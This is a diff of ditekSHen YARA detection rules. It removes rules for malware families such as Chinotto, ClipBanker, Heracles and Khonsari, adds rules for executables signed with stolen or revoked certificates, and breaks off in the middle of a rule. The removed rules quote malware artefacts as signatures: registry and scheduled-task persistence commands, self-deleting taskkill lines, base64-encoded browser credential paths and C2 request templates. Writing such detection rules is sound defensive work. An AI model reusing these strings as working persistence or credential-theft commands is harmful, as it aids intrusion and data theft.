-		$x1 = "\\share\\kdcdll\\user641.pdb" ascii
-		$x2 = "5ADSelf@tech*7890" fullword wide
-		$kdc1 = "KdcVerifyEncryptedTimeStamp" ascii wide nocase
-		$kdc2 = "KerbHashPasswordEx3" ascii wide nocase
-		$kdc3 = "KerbFreeKey" ascii wide nocase
-		$r1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
-		$r2 = "KDC Service" fullword ascii
-		$s1 = "download//symbols//%S//%S//%S" fullword wide
-		$s2 = "c:\\windows\\system32\\kdcsvc.dll" fullword wide nocase
-		$s3 = /WinHttp(Send|Receive)(Request|Response) failed (0x%.8X)/ fullword wide
+		thumbprint = "e2a5a2823b0a56c88bfcb2788aa4406e084c4c9b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of them ) or ( all of ( $kdc* ) and ( 1 of ( $x* ) or all of ( $r* ) or 2 of ( $s* ) ) ) or ( 8 of them ) or ( pe.exports ( "MainFun" ) and pe.exports ( "NetApiBufferFree" ) and pe.exports ( "BeaEngineRevision" ) and pe.exports ( "BeaEngineVersion" ) and pe.exports ( "Disasm" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DsGetDcName" ) and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eaaebecedccfd" and pe.signatures [ i ] . serial == "72:f3:e4:70:7b:94:d0:ee:f2:14:38:4d:e9:b3:6e" )
 }
-rule DITEKSHEN_MALWARE_Win_Chinotto : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D875B3E3F2Db6C3Eb426E24946066111 : FILE
 {
 	meta:
-		description = "Detects Chinotto"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e66703d4-c9c6-5bb4-9e07-11dc89b0a034"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a44cde8b-904b-5f1a-8cdb-4a8b16a42669"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8702-L8754"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3477-L3488"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "92f37bdc4cf17e07bb556c60e3bde4547c34f67a2fb5c806000d9cb2446adff1"
+		logic_hash = "470424bf28b723063be5d6801ee27b0f3748b761f9005616dcab4bd864db5463"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "xxxchinotto" ascii wide
-		$x2 = "\\Chinotto.pdb" ascii wide
-		$x3 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31
-                0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e
-                67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65
-                0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f
-                7a 69 6c 6c 61 2f 34 2e 30 28 63 6f 6d 70 61 74
-                69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20
-                57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
-                53 56 31 29 0d 0a 41 63 63 65 70 74 3a 20 69 6d
-                61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65 2f 78
-                2d 78 62 69 74 6d 61 70 2c 20 69 6d 61 67 65 2f
-                6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 6a 70 65
-                67 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78
-                2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68
-                2c 20 2a 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67
-                75 61 67 65 3a 20 65 6e 2d 75 73 0d 0a 43 6f 6e
-                74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69
-                70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 62
-                6f 75 6e 64 61 72 79 3d 25 73 0d 0a 48 6f 73 74
-                3a 20 25 73 3a 25 64 0d 0a 43 6f 6e 74 65 6e 74
-                2d 4c 65 6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e
-                6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c
-                69 76 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
-                6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a
-                00 00 00 00 48 54 54 50 2f 31 2e 31 20 32 30 30
-                20 4f 4b 00 0d 0a 0d 0a 00 00 00 00 65 72 72 6f
-                72 3c 2f 62 3e }
-		$s1 = "Run /v xxxzexs /t REG_SZ /d %s /f" ascii wide
-		$s2 = "ShellExecute Error, ret" ascii wide
-		$s3 = "Run app succeed" ascii
-		$s4 = "cleartemp:" fullword ascii
-		$s5 = "wakeup:" fullword ascii
-		$s6 = "updir:" fullword ascii
-		$s7 = "regstart:" fullword ascii
-		$s8 = "chdec:" fullword ascii
-		$s9 = "cmd:" fullword ascii
-		$s10 = "error</b>" fullword ascii
-		$c1 = "Host: %s:%d" ascii wide
-		$c2 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)" ascii wide
-		$c3 = "Mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/78.0.3904.108 Safari/537.36" ascii wide
-		$c4 = "id=%s&type=hello&direction=send" ascii wide
-		$c5 = "id=%s&type=command&direction=receive" ascii wide
-		$c6 = "id=%s&type=file&direction=" ascii wide
-		$c7 = "id=%s&type=result&direction=" ascii wide
+		thumbprint = "d27211a59dc8a4b3073d116621b6857c3d70ed04"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $c* ) ) ) or 4 of ( $c* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Tardigrade : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3990362C34015Ce4C23Ecc3377Fd3C06 : FILE
 {
 	meta:
-		description = "Detects Tardigrade"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a46caaaa-2954-552a-a20f-952c47370393"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e76824c2-6ee7-5117-a83f-0b8e4f2d3b61"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8756-L8787"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3490-L3501"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2bd4f23f66844a320b6bed6242ba39096f66a08affb84abd78c342d433ed9fe6"
+		logic_hash = "5e91a10f5027cae35524bef326edf7d5bf3df5bbc37c111b01e33f7667b03ce3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
-		hash2 = "966b2c7c72a28310acd58bb23af4d3c893b2afca264b2d9c0ec42db815c77487"
-		hash3 = "88be5da274df704dc7fd9882c661a0afdd35f1ce0a7145e30f51c292abd2a86b"
-		hash4 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
-		hash5 = "4afd9f0dde092daeac3f3e6ffb0aee06682b3dba6005d2bd1a914eefd5cc6a30"
-
-	strings:
-		$x1 = "cmd.exe /c echo kOJAdtQoDcMuogIZIl>\"%s\"&exit" fullword ascii
-		$x2 = "cmd.exe /c echo HBnBcZPeUevCDQmKGzXxYJHqpzRAbRCQCihOxiLi>\"%s\"&exit" fullword ascii
-		$x3 = "cmd.exe /c set kpUUCjoLWLZvJFc=3167 & reg add HKCU\\SOFTWARE\\EQwIobTRgsJ /v PDMXPmqSYnUx /t REG_DWORD /d 10080 & exit" fullword ascii
-		$s1 = "ReplaceFileA" ascii
-		$s2 = "FlushFileBuffers" ascii
-		$s3 = "WaitNamedPipeA" ascii
-		$s4 = "ImpersonateNamedPipeClient" ascii
-		$s5 = "RegFlushKey" ascii
-		$s6 = /cmd\.exe \/c (echo|set)/ ascii
-		$s7 = ">\"%s\"&exit" ascii
+		thumbprint = "48444dec9d6839734d8383b110faabe05e697d45"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( 1 of ( $x* ) or 6 of ( $s* ) ) and ( pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllMain" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "InitHelperDll" ) and pe.exports ( "StartW" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" )
 }
-rule DITEKSHEN_MALWARE_Win_Clipbanker02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_54A6D33F73129E0Ef059Ccf51Be0C35E : FILE
 {
 	meta:
-		description = "Detects ClipBanker infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c2a480cf-e81b-53a2-999a-80209050e0cf"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7b010276-718f-5168-bd8c-414252996fe6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8789-L8814"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3503-L3514"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "51a43245b1e0b6fea874302b73bf552012c54c3f7c12b8c447c96c2ffdcc1dcb"
+		logic_hash = "93b332e4ad4e13c7e8241cf866091708232a6555a9240d828e558688167359a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\Allcome\\Source code\\Clipper\\" ascii nocase
-		$x2 = "\\cleaper\\Release\\cleaper.pdb" ascii nocase
-		$v1_1 = "&username=" fullword ascii
-		$v1_2 = "/card.php?data=" fullword ascii
-		$v1_3 = "/Create /tn MicrosoftDriver /sc MINUTE /tr" fullword ascii
-		$v1_4 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" fullword ascii
-		$v1_5 = "/API/Clipper/ykesqk0o.php?cf6zrlhn=" fullword ascii
-		$v1_6 = "&di7ztth6=" fullword ascii
-		$v1_7 = "/API/Clipper/hr627gzk.php?v6etwxo5=" fullword ascii
-		$v2_1 = "bitcoincash:" fullword ascii
-		$v2_2 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" ascii
-		$re1 = "^[0-9]{16}$" fullword ascii
-		$re2 = "^[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}" fullword ascii
-		$re3 = "^\\d{2}\\D\\d{2}" fullword ascii
-		$re4 = "^[0-9]{3}" fullword ascii
-		$re5 = "([\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?)" fullword ascii
-		$re6 = "(\\d{2}\\D\\d{2})" fullword ascii
-		$re7 = "(\\d{3})" fullword ascii
+		thumbprint = "8ada307ab3a8983857d122c4cb48bf3b77b49c63"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 5 of ( $v1* ) or all of ( $v2* ) ) ) or ( 3 of ( $re* ) and ( 2 of ( $v1* ) or 2 of ( $v2* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_Badjoke : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A55C15F733Bf1633E9Ffae8A6E3B37D : FILE
 {
 	meta:
-		description = "Detects BadJoke / Witch"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "082727d5-618f-542d-93ca-ba93be16cd80"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "86d8453b-115d-59f8-8123-5aff071ec3dd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8816-L8831"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3516-L3527"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4699a772bcd50d2fe43740df59a4c56598ba43ebcc18acbf8ec401b6f5a01fe6"
+		logic_hash = "a772edb12dc0c351bb4d11f3e6ab3d9705af156ebeb4b8fff281bb418bfa1764"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "msdownld.tmp" fullword ascii
-		$s2 = "UPDFILE%lu" fullword ascii
-		$s3 = "Command.com /c %s" fullword ascii
-		$s4 = "launch.cmd" fullword ascii
-		$s5 = "virus.vbs" fullword ascii
-		$s6 = "virus.py" fullword ascii
-		$m1 = "Message from Google Virus" ascii
-		$m2 = "you cannot get rid of this virus" ascii
+		thumbprint = "591f68885fc805a10996262c93aab498c81f3010"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $s* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" )
 }
-rule DITEKSHEN_MALWARE_Win_Heracles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F675139Ea68B897A865A98F8E4611F00 : FILE
 {
 	meta:
-		description = "Detects Heracles infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "36cb9366-c70b-5117-955f-402f87f3a88c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7035ed66-73f9-568e-9698-13d9bbede64e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8833-L8861"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3529-L3540"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1d5c80c084f9d6e4692a18f74574179095ecdd5eaadd70b5d16c19702761d74f"
+		logic_hash = "9893e21fd2d5a475c9defb484921de17f4afc00619be413b9d5d55095e7f596a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "aHR0cHM6Ly9uYWNrZXIudG9hbnNlY3UuY29tL3VwbG9hZHM/a2V5PX" wide
-		$b1 = "XEdvb2dsZVxDaHJvbWVc" wide
-		$b2 = "XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3Nlcl" wide
-		$b3 = "XENvY0NvY1xCcm93c2VyX" wide
-		$b4 = "VXNlciBEYXRh" wide
-		$b5 = "RGVmYXVsdA" wide
-		$b6 = "UHJvZmlsZQ" wide
-		$b7 = "Q29va2llcw" wide
-		$b8 = "TG9naW4gRGF0YQ" wide
-		$b9 = "TG9jYWwgU3RhdGU" wide
-		$b10 = "bG9jYWxzdGF0ZQ" wide
-		$b11 = "bG9naW5kYXRh" wide
-		$s1 = "encrypted_key" fullword wide
-		$s2 = "<GetIpInfoAsync>d__" ascii
-		$s3 = "<reqHTML>5__" ascii
-		$s4 = "<idHardware>5__" ascii
-		$s5 = "<profilePaths>5__" ascii
-		$s6 = "<cookieFile>5__" ascii
-		$s7 = "<loginDataFile>5__" ascii
-		$s8 = "<localStateFile>5__" ascii
-		$s9 = "<postData>5__" ascii
+		thumbprint = "06d46ee9037080c003983d76be3216b7cad528f8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $b* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Onlylogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : FILE
 {
 	meta:
-		description = "Detects OnlyLogger loader variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "525aa2a0-5090-5f96-999b-67ca4379f897"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "be18fe1a-f810-5153-b565-97a0e33cf406"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8863-L8882"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3542-L3553"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1b39a4d2a6d3a2633cfa98adc1dfe99d10d2493fd06c9f875c56ec7689b7a561"
+		logic_hash = "c5f7f23d9ba35bed3540233217e18b84c5ac0528fd3fe809c162fce6ccce0791"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = { 45 6c 65 76 61 74 65 64 00 00 00 00 4e 4f 54 20 65 6c 65 76 61 74 65 64 }
-		$s2 = "\" /f & erase \"" ascii
-		$s3 = "/c taskkill /im \"" ascii
-		$s4 = "KILLME" fullword ascii
-		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$gn = ".php?pub=" ascii
-		$ip = /\/1[a-z0-9A-Z]{4,5}/ fullword ascii
-		$h1 = "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1" fullword ascii
-		$h2 = "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8" fullword ascii
-		$h3 = "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1" fullword ascii
-		$h4 = "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0" fullword ascii
-		$h5 = "Content-Type: application/x-www-form-urlencoded" fullword wide
+		thumbprint = "84b5ef4f981020df2385754ab1296821fa2f8977"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( #ip > 5 and ( $gn or 3 of ( $s* ) or all of ( $h* ) ) ) or ( all of ( $h* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" )
 }
-rule DITEKSHEN_MALWARE_Win_Blackbytego : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_62B80Fc5E1C02072019C88Ee356152C1 : FILE
 {
 	meta:
-		description = "Detects BlackByte ransomware Go variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "25431446-8cce-54cc-925d-5d9147344c6d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "08db7669-c3d6-5f27-988e-96e9fc0a60f3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8884-L8904"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3555-L3566"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3e6a4a2f043293e8693cfbe1515681ce0616d98e2492732fc06a01a96309883"
+		logic_hash = "c06e31f5a071ff7c87af216d22bffa2970372fa341ad2593ef0c3c6a71dac945"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "BlackByteGO/_cgo_gotypes.go" fullword ascii
-		$x3 = "BlackByteGO/" ascii nocase
-		$s1 = ".Disconnect" ascii
-		$s2 = ".OpenService" ascii
-		$s3 = ".ListServices" ascii
-		$s4 = ".Start" ascii
-		$s5 = ".Encrypt" ascii
-		$s6 = ".Decrypt" ascii
-		$s7 = ".MustFindProc" ascii
-		$s8 = ".QuoRem" ascii
-		$s9 = "C:\\Windows\\regedit.exe" fullword wide
+		thumbprint = "0a83c0f116020fc1f43558a9a08b1f8bcbb809e0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Inversum" and pe.signatures [ i ] . serial == "62:b8:0f:c5:e1:c0:20:72:01:9c:88:ee:35:61:52:c1" )
 }
-rule DITEKSHEN_MALWARE_Win_Vulturi : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F0E150C304De35F2E9086185581F4053 : FILE
 {
 	meta:
-		description = "Detects Vulturi infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dca814d6-ca26-5315-9f80-628ee50e8dfa"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d2a5cd5b-1e4a-5714-bff2-08f2c958cd0b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8906-L8931"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3581-L3592"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4d1d88764dd72ae78a74b802e11c2f28899b7b9f45c54cf3bf7aaac49dd48d7f"
+		logic_hash = "fe3d5d57d0a98414e3e4f35248d3ebf64617c16a4119a21883c3679b06146745"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Vulturi_" ascii wide
-		$x2 = "VulturiProject" fullword ascii
-		$s1 = { 5b 00 2d 00 5d 00 20 00 53 00 65 00 72 00 76 00
-               65 00 72 00 20 00 ?? ?? 20 00 69 00 73 00 20 00
-               6f 00 66 00 66 00 6c 00 69 00 6e 00 65 00 2e 00
-               2e 00 2e 00 00 ?? 5b 00 2b 00 5d 00 20 00 53 00
-               65 00 72 00 76 00 65 00 72 00 20 00 00 ?? ?? 00
-               69 00 73 00 20 00 6f 00 6e 00 6c 00 69 00 6e 00
-               65 00 }
-		$s2 = "Writing is not alowed" wide
-		$s3 = "System\\ProcessList.txt" fullword wide
-		$s4 = "[X] GetSSL ::" fullword wide
-		$s5 = "Failed to steal " wide
-		$s6 = "StealerStub" fullword ascii
-		$s7 = "/C chcp 65001 && netsh" wide
-		$n1 = "fetch_options" fullword wide
-		$n2 = "send_report" fullword wide
-		$n3 = "?username=" fullword wide
+		thumbprint = "c0a448b9101f48309a8e5a67c11db09da14b54bb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and any of them ) or all of ( $n* ) or 5 of ( $s* ) or ( 1 of ( $n* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rare Ideas, LLC" and pe.signatures [ i ] . serial == "f0:e1:50:c3:04:de:35:f2:e9:08:61:85:58:1f:40:53" )
 }
-rule DITEKSHEN_MALWARE_Win_Tofsee : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_A1A3E7280E0A2Df12F84309649820519 : FILE
 {
 	meta:
-		description = "Detects Tofsee"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "86371c0b-72f9-56c0-9f34-f14d2a069c91"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "71ad82d6-e45e-52a9-b1ff-f00cfe7b5186"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8933-L8949"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3594-L3605"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ef06643173c70c5b06b19200cb5b5efa7db7eb3516b67621f0b1975f1c80781"
+		logic_hash = "5c656fa5a6671f717cda5433c8780d308f11b7937e5ff66b4f3f74623b217365"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "n%systemroot%\\system32\\cmd.exe" fullword wide
-		$s2 = "loader_id" fullword ascii
-		$s3 = "start_srv" fullword ascii
-		$s4 = "lid_file_upd" fullword ascii
-		$s5 = "localcfg" fullword ascii
-		$s6 = "Incorrect respons" fullword ascii
-		$s7 = "mx connect error" fullword ascii
-		$s8 = "Error sending command (sent = %d/%d)" fullword ascii
-		$s9 = "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u" fullword ascii
+		thumbprint = "33d254c711937b469d1b08ef15b0a9f5b4d27250"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nir Sofer" and pe.signatures [ i ] . serial == "a1:a3:e7:28:0e:0a:2d:f1:2f:84:30:96:49:82:05:19" )
 }
-rule DITEKSHEN_MALWARE_Win_Khonsari : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Fb984D5A7296Ba74445C23Ead7D20Aa : FILE
 {
 	meta:
-		description = "Detects Khonsari ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2d562e62-a948-570d-8ff2-cc4835b91573"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1e290f81-11ab-5d5f-ab7a-c703c875bde4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8951-L8963"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3607-L3618"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a78f36259481fccb31b2e6248fed19699b6eb05bacfd08905414764c3045943"
+		logic_hash = "ff29013eb20bccbec16107404fc18b07c87ac5269b788c48a49a490271e94052"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = ".khonsari" fullword wide nocase
-		$s1 = "Encrypt" fullword ascii
-		$s2 = "CreateEncryptor" fullword ascii
-		$s3 = "GenerateKey" fullword ascii
-		$s4 = "277e5e6a-4da6-4138-97fa-3fecbdad0176" ascii
